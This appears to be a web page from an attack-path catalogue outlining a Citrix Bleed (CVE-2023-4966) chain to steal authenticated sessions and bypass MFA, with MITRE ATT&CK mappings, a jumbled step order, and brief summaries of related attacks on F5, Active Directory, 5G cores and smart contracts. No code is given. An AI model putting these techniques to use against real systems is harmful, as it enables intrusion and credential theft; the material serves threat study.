Citrix Bleed → steal authenticated session → MFA bypass

§ Context

Assumed environment: target operates Citrix NetScaler / ADC / Gateway with CVE-2023-4966 unpatched. At least one user with corporate access has authenticated recently and has a live session in memory.

§ Steps

1. 01
   Reach internal corporate appsInitial Access

   T1078— Valid Accounts
2. 02
   Replay token into authenticated portalLateral Movement

   T1550.003— Pass the Ticket
3. 03
   Continue chain (BloodHound / Kerberoast)Discovery

   AD-BLOODHOUND— BloodHound / SharpHound Enumeration
4. 04
   Parse leaked session tokenCredential Access

   T1539— Steal Web Session Cookie
5. 05
   Identify NetScaler versionReconnaissance

   W-RECON-FINGERPRINT— Tech Stack Fingerprinting
6. 06
   Trigger Citrix Bleed memory disclosureCredential Access

   VPN-CITRIX-BLEED— Citrix Bleed (CVE-2023-4966)

§ References

• T1078Valid Accounts
• T1550.003Pass the Ticket
• T1539Steal Web Session Cookie

§ Frequently asked

What is the "Citrix Bleed → steal authenticated session → MFA bypass" attack path?

Send a long Host header to a vulnerable NetScaler — memory disclosure leaks an authenticated session token already past MFA. Replay the token to log into the corporate VPN. It chains 6 steps drawn from real-world offensive-security techniques.

What starting position does this attack require?

The first step is Reach internal corporate apps (T1078) — a initial access primitive. Assumed environment: target operates Citrix NetScaler / ADC / Gateway with CVE-2023-4966 unpatched.

What is the final impact of this kill-chain?

The final step lands on Trigger Citrix Bleed memory disclosure (VPN-CITRIX-BLEED), which falls under Credential Access. From here, an operator typically pivots into post-exploitation or maintains persistence.

How can defenders detect or prevent this attack?

Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.

§ Related dossiers

• Shared techniques3

  F5 BIG-IP iControl auth bypass (CVE-2022-1388) → root on LB

  Connection-header smuggle bypasses iControl REST auth, command-injection RCE as root. Load balancers see all traffic — recover TLS keys, session cookies, internal SSO config.

• Shared techniques3

  Unconstrained delegation → Capture DC TGT → DCSync

  Compromise a host with TRUSTED_FOR_DELEGATION, coerce a DC to authenticate to it, harvest the DC's TGT from its LSASS, then DCSync.

• Shared techniques2

  5G core GTP-U user-plane injection → subscriber MITM

  Attacker on a transit network between mobile-core hops (or with compromised UPF). GTP-U packets are typically unfiltered between PEs; inject packets into subscriber bearers — credential capture, free-of-charge tunnels, downstream attacks.

• Shared techniques2

  Vesting beneficiary replace → silently drain stream

  Bug in a custom vesting contract allows anyone to call setBeneficiary on existing schedules. Replace beneficiary with attacker address; legitimate token stream now flows to attacker until released funds are noticed.

• Shared techniques2

  ERC-4337 paymaster sponsor drain

  A paymaster sponsors all UserOperations without per-user gas accounting. Spam tiny UserOps from many bundled addresses — paymaster pays the gas until its deposit hits zero.

• Shared techniques2

  Leaked legacy VPN credential → ransomware (Colonial-class)

  A dormant VPN account whose password appeared in a third-party breach is still active, has no MFA enforced. Sign in, recon AD, deploy ransomware across the estate.